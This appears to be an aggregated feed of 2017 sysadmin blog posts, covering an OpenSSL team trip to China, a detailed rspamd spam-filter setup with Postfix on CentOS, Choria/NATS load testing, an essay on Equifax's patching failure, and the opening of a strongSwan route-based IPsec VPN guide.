It wasn’t unusual for our host to have a full day’s work (full from our typical western point of view) and then after making sure we were heading to sleep in our rooms to then head out to catch up with friends and colleagues from the companies we had visited during the day. And then the next morning have to be up again early (very early from a Chinese engineer perspective) to make sure we had breakfast and were ready for the bus ride to whatever our destination was for the first visit of the day

Chinese Company Exhibits

The larger companies that we visited all have exhibition areas to show visitors what the company does (and how successful the company is). The larger the company the more focus there was on packing in maximum information into the exhibits. Having 20 separate displays was not unusual. These exhibits were clearly designed for both a Chinese audience and an English audience.

How many products, customers, engineers, and how much revenue and what problems the company products solve were on proud display. It was very interesting watching the reactions of the other team members who clearly hadn’t internalised the size and scope of China or the technical developments and achievements of Chinese companies. For me, having been exposed to Chinese companies before and experiencing the different scale at which they operate it was still a surprise - but much less so that to some of the others.

Open Source Presentation Day

On the Saturday (selected so that it would be easier for engineers to attend), we had a half-day presentation session. We will post the presentations in a week or two, once we are sure we have all the final presentations from both the team members and the two local speakers.

Press Coverage

There have already been at least three articles written based on the interviews with Paul Yang from BaishanCloud, Tim Hudson, and Steve Marquess from the OpenSSL team. We expect there will be many more.

Fond Memories

We experienced the beautiful lakes, trees, forests, temples, art and even some music. We climbed up ancient steps, walked through buildings made long ago, and listened to stories from another century. None of this was why we came to China - but we are all grateful for the experiences that our hosts provided us and the thinking and planning that clearly went into the visit.

We all took photos - ranging from the professional camera equipment (Richard) to the cheapest phone money can buy with a tiny little screen (Steve) to the range of different smartphones the rest of us (Matt, Rich and myself) use on a daily basis. When Richard’s camera ran out of battery he switched to his phone and kept taking photos. We have so many amazing photos that will help us all remember this experience for years to come.

New Friends

I have made new friends on this trip - friends that I plan to stay in touch with now that I know what the “right” way to communicate that works when talking with China based engineers. The tools and language may be different - but there is enough in common with the goals and aspirations that we can all work together.

September 28, 2017 01:00 AM

September 27, 2017

The Lone Sysadmin

Software is Always Broken

I’m sitting here watching my iPhone update to iOS 11.0.1. Apple says that there are just a couple of fixes: some security updates and a fix for the Exchange email problems. The update is sure taking a while, though. That’s consistent with my knowledge of how software development works. Color me skeptical that the first […]

The post Software is Always Broken appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at September 27, 2017 06:39 AM

Evaggelos Balaskas

Rspamd Fast, free and open-source spam filtering system

Fighting Spam

Fighting email spam in modern times most of the times looks like this:

1ab83c40625d102da1b3001438c0f03b.gif

Rspamd

Rspamd is a rapid spam filtering system. Written in C with Lua script engine extension seems to be really fast and a really good solution for SOHO environments.

In this blog post, I'’ll try to present you a quickstart guide on working with rspamd on a CentOS 6.9 machine running postfix.

DISCLAIMER: This blog post is from a very technical point of view!

Installation

We are going to install rspamd via know rpm repositories:

Epel Repository

We need to install epel repository first:

# yum -y install http://fedora-mirror01.rbc.ru/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

Rspamd Repository

Now it is time to setup the rspamd repository:

# curl https://rspamd.com/rpm-stable/centos-6/rspamd.repo -o /etc/yum.repos.d/rspamd.repo

Install the gpg key

# rpm --import http://rspamd.com/rpm-stable/gpg.key

and verify the repository with # yum repolist

repo id     repo name
base        CentOS-6 - Base
epel        Extra Packages for Enterprise Linux 6 - x86_64
extras      CentOS-6 - Extras
rspamd      Rspamd stable repository
updates     CentOS-6 - Updates

Rpm

Now it is time to install rspamd to our linux box:

# yum -y install rspamd


# yum info rspamd

Name        : rspamd
Arch        : x86_64
Version     : 1.6.3
Release     : 1
Size        : 8.7 M
Repo        : installed
From repo   : rspamd
Summary     : Rapid spam filtering system
URL         : https://rspamd.com
License     : BSD2c
Description : Rspamd is a rapid, modular and lightweight spam filter. It is designed to work
            : with big amount of mail and can be easily extended with own filters written in
            : lua.

Init File

We need to correct rspamd init file so that rspamd can find the correct configuration file:

# vim /etc/init.d/rspamd

# ebal, Wed, 06 Sep 2017 00:31:37 +0300
## RSPAMD_CONF_FILE="/etc/rspamd/rspamd.sysvinit.conf"
RSPAMD_CONF_FILE="/etc/rspamd/rspamd.conf"

Start Rspamd

We are now ready to start for the first time rspamd daemon:

# /etc/init.d/rspamd restart

syntax OK
Stopping rspamd:                                           [FAILED]
Starting rspamd:                                           [  OK  ]

verify that is running:

# ps -e fuwww | egrep -i rsp[a]md


root      1337  0.0  0.7 205564  7164 ?        Ss   20:19   0:00 rspamd: main process
_rspamd   1339  0.0  0.7 206004  8068 ?        S    20:19   0:00  _ rspamd: rspamd_proxy process
_rspamd   1340  0.2  1.2 209392 12584 ?        S    20:19   0:00  _ rspamd: controller process
_rspamd   1341  0.0  1.0 208436 11076 ?        S    20:19   0:00  _ rspamd: normal process   

perfect, now it is time to enable rspamd to run on boot:

# chkconfig rspamd on

# chkconfig --list | egrep rspamd
rspamd          0:off   1:off   2:on    3:on    4:on    5:on    6:off

Postfix

In a nutshell, postfix will pass through (filter) an email using the milter protocol to another application before queuing it to one of postfix’s mail queues. Think milter as a bridge that connects two different applications.

rspamd_milter_direct.png

Rspamd Proxy

In Rspamd 1.6 Rmilter is obsoleted but rspamd proxy worker supports milter protocol. That means we need to connect our postfix with rspamd_proxy via milter protocol.

Rspamd has a really nice documentation: https://rspamd.com/doc/index.html
On MTA integration you can find more info.

# netstat -ntlp | egrep -i rspamd

output:

tcp        0      0 0.0.0.0:11332               0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 0.0.0.0:11333               0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 127.0.0.1:11334             0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 :::11332                    :::*                        LISTEN      1451/rspamd
tcp        0      0 :::11333                    :::*                        LISTEN      1451/rspamd
tcp        0      0 ::1:11334                   :::*                        LISTEN      1451/rspamd  

# egrep -A1 proxy /etc/rspamd/rspamd.conf


worker "rspamd_proxy" {
    bind_socket = "*:11332";
    .include "$CONFDIR/worker-proxy.inc"
    .include(try=true; priority=1,duplicate=merge) "$LOCAL_CONFDIR/local.d/worker-proxy.inc"
    .include(try=true; priority=10) "$LOCAL_CONFDIR/override.d/worker-proxy.inc"
}

Milter

If you want to know all the possibly configuration parameter on postfix for milter setup:

# postconf | egrep -i milter

output:

milter_command_timeout = 30s
milter_connect_macros = j {daemon_name} v
milter_connect_timeout = 30s
milter_content_timeout = 300s
milter_data_macros = i
milter_default_action = tempfail
milter_end_of_data_macros = i
milter_end_of_header_macros = i
milter_helo_macros = {tls_version} {cipher} {cipher_bits} {cert_subject} {cert_issuer}
milter_macro_daemon_name = $myhostname
milter_macro_v = $mail_name $mail_version
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {mail_host} {mail_mailer}
milter_protocol = 6
milter_rcpt_macros = i {rcpt_addr} {rcpt_host} {rcpt_mailer}
milter_unknown_command_macros =
non_smtpd_milters =
smtpd_milters = 

We are mostly interested in the last two, but it is best to follow rspamd documentation:

# vim /etc/postfix/main.cf

Adding the below configuration lines:

# ebal, Sat, 09 Sep 2017 18:56:02 +0300

## A list of Milter (mail filter) applications for new mail that does not arrive via the Postfix smtpd(8) server.
on_smtpd_milters = inet:127.0.0.1:11332

## A list of Milter (mail filter) applications for new mail that arrives via the Postfix smtpd(8) server.
smtpd_milters = inet:127.0.0.1:11332

## Send macros to mail filter applications
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {client_addr} {client_name} {mail_host} {mail_mailer}

## skip mail without checks if something goes wrong, like rspamd is down !
milter_default_action = accept

Reload postfix

# postfix reload

postfix/postfix-script: refreshing the Postfix mail system

Testing

netcat

From a client:

$ nc 192.168.122.96 25

220 centos69.localdomain ESMTP Postfix
EHLO centos69
250-centos69.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM: <root@example.org>
250 2.1.0 Ok
RCPT TO: <root@localhost>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
test
.
250 2.0.0 Ok: queued as 4233520144
^]

Logs

Looking through logs may be a difficult task for many, even so it is a task that you have to do.

MailLog

# egrep 4233520144 /var/log/maillog


Sep  9 19:08:01 localhost postfix/smtpd[1960]: 4233520144: client=unknown[192.168.122.1]
Sep  9 19:08:05 localhost postfix/cleanup[1963]: 4233520144: message-id=<>
Sep  9 19:08:05 localhost postfix/qmgr[1932]: 4233520144: from=<root@example.org>, size=217, nrcpt=1 (queue active)
Sep  9 19:08:05 localhost postfix/local[1964]: 4233520144: to=<root@localhost.localdomain>, orig_to=<root@localhost>, relay=local, delay=12, delays=12/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
Sep  9 19:08:05 localhost postfix/qmgr[1932]: 4233520144: removed

Everything seems fine with postfix.

Rspamd Log

# egrep -i 4233520144 /var/log/rspamd/rspamd.log

2017-09-09 19:08:05 #1455(normal) <79a04e>; task; rspamd_message_parse: loaded message; id: <undef>; queue-id: <4233520144>; size: 6; checksum: <a6a8e3835061e53ed251c57ab4f22463>

2017-09-09 19:08:05 #1455(normal) <79a04e>; task; rspamd_task_write_log: id: <undef>, qid: <4233520144>, ip: 192.168.122.1, from: <root@example.org>, (default: F (add header): [9.40/15.00] [MISSING_MID(2.50){},MISSING_FROM(2.00){},MISSING_SUBJECT(2.00){},MISSING_TO(2.00){},MISSING_DATE(1.00){},MIME_GOOD(-0.10){text/plain;},ARC_NA(0.00){},FROM_NEQ_ENVFROM(0.00){;root@example.org;},RCVD_COUNT_ZERO(0.00){0;},RCVD_TLS_ALL(0.00){}]), len: 6, time: 87.992ms real, 4.723ms virtual, dns req: 0, digest: <a6a8e3835061e53ed251c57ab4f22463>, rcpts: <root@localhost>

It works !

Training

If you have already a spam or junk folder is really easy training the Bayesian classifier with rspamc.

I use Maildir, so for my setup the initial training is something like this:

 # cd /storage/vmails/balaskas.gr/evaggelos/.Spam/cur/ 

# find . -type f -exec rspamc learn_spam {} \;

Auto-Training

I’ve read a lot of tutorials that suggest real-time training via dovecot plugins or something similar. I personally think that approach adds complexity and for small companies or personal setup, I prefer using Cron daemon:


 @daily /bin/find /storage/vmails/balaskas.gr/evaggelos/.Spam/cur/ -type f -mtime -1 -exec rspamc learn_spam {} \;

That means every day, search for new emails in my spam folder and use them to train rspamd.

Training from mbox

First of all seriously ?

Split mbox

There is a nice and simply way to split a mbox to separated files for rspamc to use them.

# awk '/^From / {i++}{print > "msg"i}' Spam

and then feed rspamc:

# ls -1 msg* | xargs rspamc --verbose learn_spam

Stats

# rspamc stat


Results for command: stat (0.068 seconds)
Messages scanned: 2
Messages with action reject: 0, 0.00%
Messages with action soft reject: 0, 0.00%
Messages with action rewrite subject: 0, 0.00%
Messages with action add header: 2, 100.00%
Messages with action greylist: 0, 0.00%
Messages with action no action: 0, 0.00%
Messages treated as spam: 2, 100.00%
Messages treated as ham: 0, 0.00%
Messages learned: 1859
Connections count: 2
Control connections count: 2157
Pools allocated: 2191
Pools freed: 2170
Bytes allocated: 542k
Memory chunks allocated: 41
Shared chunks allocated: 10
Chunks freed: 0
Oversized chunks: 736
Fuzzy hashes in storage "rspamd.com": 659509399
Fuzzy hashes stored: 659509399
Statfile: BAYES_SPAM type: sqlite3; length: 32.66M; free blocks: 0; total blocks: 430.29k; free: 0.00%; learned: 1859; users: 1; languages: 4
Statfile: BAYES_HAM type: sqlite3; length: 9.22k; free blocks: 0; total blocks: 0; free: 0.00%; learned: 0; users: 1; languages: 1
Total learns: 1859

X-Spamd-Result

To view the spam score in every email, we need to enable extended reporting headers and to do that we need to edit our configuration:

# vim /etc/rspamd/modules.d/milter_headers.conf

and just above use add :

    # ebal, Wed, 06 Sep 2017 01:52:08 +0300
    extended_spam_headers = true;

   use = [];

then reload rspamd:

# /etc/init.d/rspamd reload

syntax OK
Reloading rspamd:                                          [  OK  ]

View Source

If your open the email in view-source then you will see something like this:


X-Rspamd-Queue-Id: D0A5728ABF
X-Rspamd-Server: centos69
X-Spamd-Result: default: False [3.40 / 15.00]

Web Server

Rspamd comes with their own web server. That is really useful if you dont have a web server in your mail server, but it is not recommended.

By-default, rspamd web server is only listening to local connections. We can see that from the below ss output

# ss -lp | egrep -i rspamd

LISTEN     0      128                    :::11332                   :::*        users:(("rspamd",7469,10),("rspamd",7471,10),("rspamd",7472,10),("rspamd",7473,10))
LISTEN     0      128                     *:11332                    *:*        users:(("rspamd",7469,9),("rspamd",7471,9),("rspamd",7472,9),("rspamd",7473,9))
LISTEN     0      128                    :::11333                   :::*        users:(("rspamd",7469,18),("rspamd",7473,18))
LISTEN     0      128                     *:11333                    *:*        users:(("rspamd",7469,16),("rspamd",7473,16))
LISTEN     0      128                   ::1:11334                   :::*        users:(("rspamd",7469,14),("rspamd",7472,14),("rspamd",7473,14))
LISTEN     0      128             127.0.0.1:11334                    *:*        users:(("rspamd",7469,12),("rspamd",7472,12),("rspamd",7473,12))

127.0.0.1:11334

So if you want to change that (dont) you have to edit the rspamd.conf (core file):

# vim +/11334 /etc/rspamd/rspamd.conf

and change this line:

bind_socket = "localhost:11334";

to something like this:

bind_socket = "YOUR_SERVER_IP:11334";

or use sed:

# sed -i -e 's/localhost:11334/YOUR_SERVER_IP/' /etc/rspamd/rspamd.conf

and then fire up your browser:

rspamd_worker.png

Web Password

It is a good tactic to change the default password of this web-gui to something else.

# vim /etc/rspamd/worker-controller.inc

  # password = "q1";
  password = "password";

always a good idea to restart rspamd.

Reverse Proxy

I dont like having exposed any web app without SSL or basic authentication, so I shall put rspamd web server under a reverse proxy (apache).

So on httpd-2.2 the configuration is something like this:

ProxyPreserveHost On

<Location /rspamd>
    AuthName "Rspamd Access"
    AuthType Basic
    AuthUserFile /etc/httpd/rspamd_htpasswd
    Require valid-user

    ProxyPass http://127.0.0.1:11334
    ProxyPassReverse http://127.0.0.1:11334 

    Order allow,deny
    Allow from all 

</Location>

Http Basic Authentication

You need to create the file that is going to be used to store usernames and password for basic authentication:

# htpasswd -csb /etc/httpd/rspamd_htpasswd rspamd rspamd_passwd
Adding password for user rspamd

restart your apache instance.

bind_socket

Of course for this to work, we need to change the bind socket on rspamd.conf
Dont forget this ;)

bind_socket = "127.0.0.1:11334";

Selinux

If there is a problem with selinux, then:

# setsebool -P httpd_can_network_connect=1

or

# setsebool httpd_can_network_connect_db on

Errors ?

If you see an error like this:
IO write error

when running rspamd, then you need explicit tell rspamd to use:

rspamc -h 127.0.0.1:11334

To prevent any future errors, I’ve created a shell wrapper:

/usr/local/bin/rspamc

#!/bin/sh
/usr/bin/rspamc -h 127.0.0.1:11334 $*

Final Thoughts

I am using rspamd for a while know and I am pretty happy with it.

I’ve setup a spamtrap email address to feed my spam folder and let the cron script to train rspamd.

So after a thousand emails:

rspamd1k.jpg

September 27, 2017 12:05 AM

September 25, 2017

Steve Kemp's Blog

Started work on an internet-of-things Radio

So recently I was in York at the Bytemark office, and I read a piece about building a radio in a Raspberry Pi magazine. It got me curious, so when I got home to sunny Helsinki I figured I'd have a stab at it.

I don't have fixed goal in mind, but what I do have is:

  • A WeMos Mini D1
    • Cost €3.00
    • ESP8266-powered board, which can be programmed easily in C++ and contains on-board WiFi as well as a bunch of I/O pins.
  • A RDA5807M FM Radio chip.
    • Cost 37 cents.
    • With a crystal for support.

The initial goal is simple wire the receiver/decoder to the board, and listen to the radio.

After that there are obvious extenstions, such as adding an LCD display to show the frequency (What's the frequency Kenneth), and later to show the station details, via RDS.

Finally I could add some buttons/switches/tweaks for selecting next/previous stations, and adjusting the volume. Initially that'll be handled by pointing a browser at the IP-address of the device.

The first attempt at using the RDA5807M chip was a failure, as the thing was too damn small and non-standardly sized. Adding header-pins to the chips was almost impossible, and when I did get them soldered on the thing just gave me static-hisses.

However I later read the details of the chip more carefully and realized that it isn't powerfull enough to drive (even) headphones. It requires an amp of some kind. With that extra knowledge I was able to send the output to the powered-speakers I have sat beside my PC.

My code is basic, it sets up the FM-receiver/decoder, and scans the spectrum. When it finds a station it outputs the name over the serial console, via RDS, and then just plays it.

I've got an PAM8403-based amplifier board on-order, when that arrives I'll get back to the project, and hookup WiFi and a simple web-page to store stations, tuning, etc.

My "token goal" at the moment is a radio that switches on at 7AM and switches off at 8AM. In addition to that it'll serve a web-page allowing interactive control, regardless of any buttons that are wired in.

I also have another project in the wings. I've ordered a software-defined radio (USB-toy) which I'm planning to use to plot aircraft in real-time, as they arrive/depart/fly over Helsinki. No doubt I'll write that up too.

September 25, 2017 09:00 PM

September 24, 2017

Raymii.org

Adding IPv6 to a keepalived and haproxy cluster

At work I regularly build high-available clusters for customers, where the setup is distributed over multiple datacenters with failover software. If one component fails, the service doesn't experience issues or downtime due to the failure. Recently I was tasked with expanding a cluster setup to be also reachable via IPv6. This article goes over the settings and configuration required for haproxy and keepalived for IPv6. The internal cluster will only be IPv4, the loadbalancer terminates HTTP and HTTPS connections.

September 24, 2017 12:00 AM

September 23, 2017

Sarah Allen

memories of dragons

In my recent trip to Krakow, I bought a little blue stuffed dragon for my niece. I became curious about the legend of the Krakow dragon and wanted to find a children’s story to listen to and maybe learn a little Polish and found a fun, modern interpretation: Smok.

Two photos: Krakow dragon statue  and child shadow that kind of looks like a dragon

by sarah at September 23, 2017 03:52 PM

Evaggelos Balaskas

Walkaway by Cory Doctorow

Walkaway by Cory Doctorow

Are you willing to walk-away without anything in the world to build a better world ?

walkaway.jpg

Tag(s): books

September 23, 2017 09:36 AM

Electricmonk.nl

sshbg: Change terminal background when SSHing (for Tilix and Xterm)

This is gonna be a short post. I wrote a tool to change the background color of my terminal when I ssh to a machine. It works on Tilix and Xterm, but not most other terminals because they don't support the ANSI escape sequence for changing the background color. It works by combining SSH's LocalCommand option in combination with a small Python script that parses the given hostname. Here's a short gif of it in action:
 

It's called sshbg.

by admin at September 23, 2017 07:52 AM

September 22, 2017

R.I.Pienaar

What to consider when speccing a Choria network

In my previous post I talked about the need to load test Choria given that I now aim for much larger workloads. This post goes into a few of the things you need to consider when sizing the optimal network size.

Given that we now have the flexibility to build 50 000 node networks quite easily with Choria the question is should we, and if yes then what is the right size. As we can now federate multiple Collectives together into one where each member Collective is a standalone network we have the opportunity to optimise for the operability of the network rather than be forced to just build it as big as we can.

What do I mean when I say the operability of the network? Quite a lot of things:

  • What is your target response time on a unbatched mco rpc rpcutil ping command
  • What is your target discovery time? You should use a discovery data source but broadcast is useful, so how long do you want?
  • If you are using a discovery source, how long do you want to wait for publishes to happen?
  • How many agents will you run? Each agent makes multiple subscriptions on the middleware and consume resources there
  • How many sub collectives do you want? Each sub collective multiply the amount of subscriptions
  • How many federated networks will you run?
  • When you restart the entire NATS, how long do you want to wait for the whole network to reconnect?
  • How many NATS do you need? 1 can run 50 000 nodes, but you might want a cluster for HA. Clustering introduces overhead in the middleware
  • If you are federating a global distributed network, what impact does the latency cross the federation have and what is acceptable

So you can see that to a large extend the answer here is related to your needs and not only to the needs of benchmarking Choria. I am working on a set of tools to allow anyone to run tests locally or on a EC2 network. The main work hose is a Choria emulator that runs a 1 000 or more Choria instances on a single node so you can use a 50 node EC2 network to simulate a 50 000 node one.

Middleware Scaling Concerns


Generally for middleware brokers there are a few things that impact their scalability:

  • Number of TCP Connections – generally a thread/process is made for each
  • TLS or Plain text – huge overhead in TLS typically and it can put a lot of strain on single systems
  • Number of message targets – queues, topics, etc. Different types of target have different overheads. Often a thread/process for each.
  • Number of subscribers to each target
  • Cluster overhead
  • Persistence overheads like storage and ACKs etc

You can see it’s quite a large number of variables that goes into this, anywhere that requires a thread or process to manage 1 of it means you should get worried or at least be in a position to measure it.

NATS uses 1 go routine for each connection and no additional ones per subscription etc, its quite light weight but there are no hard and fast rules. Best to observe how it grows by needs, something I’ll include in my test suite.

How Choria uses NATS


It helps then to understand how Choria will use NATS and what connections and targets it makes.

A single Choria node will:

  • Maintain a single TCP+TLS connection to NATS
  • Subscribe to 1 queue unique to the node for every Subcollective it belongs to
  • For every agent – puppet, package, service, etc – subscribe to a broadcast topic for that agent. Once in every Subcollective. Choria comes default with 7 agents.

So if you have a node with 10 agents in 5 Subcollectives:

  • 50 broadcast subjects for agents
  • 5 queue subjects
  • 1 TCP+TLS connection

So 100 nodes will have 5 500 subscriptions, 550 NATS subjects and 100 TCP+TLS connections.

Ruby based Federation brokers will maintain 1 subscription to a queue subject on the Federation and same on the Collective. The upcoming Go based Federation Brokers will maintain 10 (configurable) connections to NATS on each side, each with these subscriptions.

Conclusion


This will give us a good input into designing a suite of tools to measure various things during the run time of a big test, check back later for details about such a tool.

You can read about the emulator I wrote in the next post.

by R.I. Pienaar at September 22, 2017 10:41 AM

September 19, 2017

R.I.Pienaar

Load testing Choria

Overview


Many of you probably know I am working on a project called Choria that modernize MCollective which will eventually supersede MCollective (more on this later).

Given that Choria is heading down a path of being a rewrite in Go I am also taking the opportunity to look into much larger scale problems to meet some client needs.

In this and the following posts I’ll write about work I am doing to load test and validate Choria to 100s of thousands of nodes and what tooling I created to do that.

Middleware


Choria builds around the NATS middleware which is a Go based middleware server that forgoes a lot of the persistence and other expensive features – instead it focusses on being a fire and forget middleware network. It has an additional project should you need those features so you can mix and match quite easily.

Turns out that’s exactly what typical MCollective needs as it never really used the persistence features and those just made the associated middleware quite heavy.

To give you an idea, in the old days the community would suggest every ~ 1000 nodes managed by MCollective required a single ActiveMQ instance. Want 5 500 MCollective nodes? That’ll be 6 machines – physical recommended – and 24 to 30 GB RAM in a cluster just to run the middleware. We’ve had reports of much larger RabbitMQ networks on 4 or 5 servers – 50 000 managed nodes or more, but those would be big machines and they had quite a lot of performance issues.

There was a time where 5 500 nodes was A LOT but now it’s becoming a bit every day, so I need to focus upward.

With NATS+Choria I am happily running 5 500 nodes on a single 2 CPU VM with 4GB RAM. In fact on a slightly bigger VM I am happily running 50 000 nodes on a single VM and NATS uses around 1GB to 1.5GB of RAM at peak.

Doing 100s of RPC requests in a row against 50 000 nodes the response time is pretty solid around 16 seconds for a RPC call to every node, it’s stable, never drops a message and the performance stays level in the absence of Java GC issues. This is fast but also quite slow – the Ruby client manages about 300 replies every 0.10 seconds due to the amount of protocol decoding etc that is needed.

This brings with it a whole new level of problem. Just how far can we take the client code and how do you determine when it’s too big and how do I know the client, broker and federation I am working on significantly improve things.

I’ve also significantly reworked the network protocol to support Federation but the shipped code optimize for code and config simplicity over lets say support for 20 000 Federation Collectives. When we are talking about truly gigantic Choria networks I need to be able to test scenarios involving 10s of thousands of Federated Network all with 10s of thousands of nodes in them. So I need tooling that lets me do this.

Getting to running 50 000 nodes


Not everyone just happen to have a 50 000 node network lying about they can play with so I had to improvise a bit.

As part of the rewrite I am doing I am building a Go framework with the Choria protocol, config parsing and network handling all built in Go. Unlike the Ruby code I can instantiate multiple of these in memory and run them in Go routines.

This means I could write a emulator that can start a number of faked Choria daemons all in one process. They each have their own middleware connection, run a varying amount of agents with a varying amount of sub collectives and generally behave like a normal MCollective machine. On my MacBook I can run 1 500 Choria instances quite easily.

So with fewer than 60 machines I can emulate 50 000 MCollective nodes on a 3 node NATS cluster and have plenty of spare capacity. This is well within budget to run on AWS and not uncommon these days to have that many dev machines around.

In the following posts I’ll cover bits about the emulator, what I look for when determining optimal network sizes and how to use the emulator to test and validate performance of different network topologies.

Follow-up Posts

by R.I. Pienaar at September 19, 2017 09:55 AM

September 18, 2017

Raymii.org

atop is broken on Ubuntu 16.04 (version 1.26): trap divide error

Recently a few of my Ubuntu 16.04 machines had issues and I was troubleshooting them, noticing `atop` logs missing. atop is a very handy tool which can be setup to record system state every X minutes, and we set it up to run every 5 minutes. You can then at a later moment see what the server was doing, even sorting by disk, memory, cpu or network usage. This post discusses the error and a quick fix.

September 18, 2017 12:00 AM

September 15, 2017

Cryptography Engineering

Patching is hard; so what?

It’s now been about a week since Equifax announced the record-breaking breach that affected 143 million Americans. We still don’t know enough — but a few details have begun to come out about the causes of the attack. It’s now being reported that Equifax’s woes stem from an unpatched vulnerability in Apache Struts that dates from March 2017, nearly two months before the breach began. This flaw, which allows remote command execution on affected servers, somehow allowed an attacker to gain access to a whopping amount of Equifax’s customer data.

While many people have criticized Equifax for its failure, I’ve noticed a number of tweets from information security professionals making the opposite case. Specifically, these folks point out that patching is hard. The gist of these points is that you can’t expect a major corporation to rapidly deploy something as complex as a major framework patch across their production systems. The stronger version of this point is that the people who expect fast patch turnaround have obviously never patched a production server.

I don’t dispute this point. It’s absolutely valid. My very simple point in this post is that it doesn’t matter. Excusing Equifax for their slow patching is both irrelevant and wrong. Worse: whatever the context, statements like this will almost certainly be used by Equifax to excuse their actions. This actively makes the world a worse place.

I don’t operate production systems, but I have helped to design a couple of them. So I understand something about the assumptions you make when building them.

If you’re designing a critical security system you have choices to make. You can build a system that provides defense-in-depth — i.e., that makes the assumption that individual components will fail and occasionally become insecure. Alternatively, you can choose to build systems that are fragile — that depend fundamentally on the correct operation of all components at all times. Both options are available to system designers, and making the decision is up to those designers; or just as accurately, the managers that approve their design.

The key point is that once you’ve baked this cake, you’d better be willing to eat it. If your system design assumes that application servers will not contain critical vulnerabilities — and you don’t have resilient systems in place to handle the possibility that they do — then you’ve implicitly made the decision that you’re never ever going to allow those vulnerabilities to fester. Once an in-the-wild vulnerability is detected in your system, you’d damn well better have a plan to patch, and patch quickly. That may involve automated testing. It may involve taking your systems down, or devoting enormous resources to monitoring activity. If you can’t do that, you’d better have an alternative. Running insecure is not an option.

So what would those systems look like? Among more advanced system designs I’ve begun to see a move towards encrypting back-end data. By itself this doesn’t do squat to protect systems like Equifax’s, because those systems are essentially “hot” databases that have to provide cleartext data to application servers — precisely the systems that Equifax’s attackers breached.

The common approach to dealing with this problem is twofold. First, you harden the cryptographic access control components that handle decryption and key management for the data — so that a breach in an application server doesn’t lead to the compromise of the access control gates. Second, you monitor, monitor, monitor. The sole advantage that encryption gives you here is that your gates for access control are now reduced to only the systems that manage encryption. Not your database. Not your web framework. Just a — hopefully — small and well-designed subsystem that monitors and grants access to each record. Everything else is monitoring.

Equifax claims to have resilient systems in place. Only time will tell if they looked like this. What seems certain is that whatever those systems are, they didn’t work. And given both the scope and scale of this breach, that’s a cake I’d prefer not to have to eat.


by Matthew Green at September 15, 2017 10:21 PM

September 13, 2017

Vincent Bernat

Route-based IPsec VPN on Linux with strongSwan

A common way to establish an IPsec tunnel on Linux is to use an IKE daemon, like the one from the strongSwan project, with a minimal configuration1:

conn V2-1
  left        = 2001:db8:1::1
  leftsubnet  = 2001:db8:a1::/64
  right       = 2001:db8:2::1
  rightsubnet = 2001:db8:a2::/64
  authby      = psk
  auto        = route

The same configuration can be used on both sides. Each side will figure out if it is “left” or “right”. The IPsec site-to-site tunnel endpoints are 2001:db8:­1::1 and 2001:db8:­2::1. The protected subnets are 2001:db8:­a1::/64 and 2001:db8:­a2::/64. As a result, strongSwan configures the following policies in the kernel:

$ ip xfrm policy
src 2001:db8:a1::/64 dst 2001:db8:a2::/64
        dir out priority 399999 ptype main
        tmpl src 2001:db8:1::1 dst 2001:db8:2::1
                proto esp reqid 4 mode tunnel
src 2001:db8:a2::/64 dst 2001:db8:a1::/64
        dir fwd priority 399999 ptype main
        tmpl src 2001:db8:2::1 dst 2001:db8:1::1
                proto esp reqid 4 mode tunnel
src 2001:db8:a2::/64 dst 2001:db8:a1::/64
        dir in priority 399999 ptype main
        tmpl src 2001:db8:2::1 dst 2001:db8:1::1
                proto esp reqid 4 mode tunnel
[…]

This kind of IPsec tunnel is a policy-based VPN: encapsulation and decapsulation are governed by these policies. Each of them contains the following elements:

  • a direction (out, in or fwd2),
  • a selector (source subnet, destination subnet, protocol, ports),
  • a mode (transport or tunnel),
  • an encapsulation protocol (esp or ah), and
  • the endpoint source and destination addresses.

When a matching policy is found, the kernel will look for a corresponding security association (using reqid and the endpoint source and destination addresses):

$ ip xfrm state
src 2001:db8:1::1 dst 2001:db8:2::1
        proto esp spi 0xc1890b6e reqid 4 mode tunnel
        replay-window 0 flag af-unspec
        auth-trunc hmac(sha256) 0x5b68[…]8ba2904 128
        enc cbc(aes) 0x8e0e377ad8fd91e8553648340ff0fa06
        anti-replay context: seq 0x0, oseq 0x0, bitmap 0x00000000
[…]

If no security association is found, the packet is put on hold and the IKE daemon is asked to negotiate an appropriate one. Otherwise, the packet is encapsulated. The receiving end identifies the appropriate security association using the SPI in the header. Two security associations are needed to establish a bidirectionnal tunnel:

$ tcpdump -pni eth0 -c2 -s0 esp
13:07:30.871150 IP6 2001:db8:1::1 > 2001:db8:2::1: ESP(spi=0xc1890b6e,seq=0x222)
13:07:30.872297 IP6 2001:db8:2::1 > 2001:db8:1::1: ESP(spi=0xcf2426b6,seq=0x204)

All IPsec implementations are compatible with policy-based VPNs. However, some configurations are difficult to implement. For example, consider the following proposition for redundant site-to-site VPNs:

Redundant VPNs between 3 sites

A possible configuration between V1-1 and V2-1 could be:

conn V1-1-to-V2-1
  left        = 2001:db8:1::1
  leftsubnet  = 2001:db8:a1::/64,2001:db8:a6::cc:1/128,2001:db8:a6::cc:5/128
  right       = 2001:db8:2::1
  rightsubnet = 2001:db8:a2::/64,2001:db8:a6::/64,2001:db8:a8::/64
  authby      = psk
  keyexchange = ikev2
  auto        = route

Each time a subnet is modified on one site, the configurations need to be updated on all sites. Moreover, overlapping subnets (2001:db8:­a6::/64 on one side and 2001:db8:­a6::cc:1/128 at the other) can also be problematic.

The alternative is to use route-based VPNs: any packet traversing a pseudo-interface will be encapsulated using a security policy bound to the interface. This brings two features:

  1. Routing daemons can be used to distribute routes to be protected by the VPN. This decreases the administrative burden when many subnets are present on each side.
  2. Encapsulation and decapsulation can be executed in a different routing instance or namespace. This enables a clean separation between a private routing instance (where VPN users are) and a public routing instance (where VPN endpoints are).

Route-based VPN on Juniper

Before looking at how to achieve that on Linux, let’s have a look at the way it works with a JunOS-based platform (like a Juniper vSRX). This platform as long-standing history of supporting route-based VPNs (a feature already present in the Netscreen ISG platform).

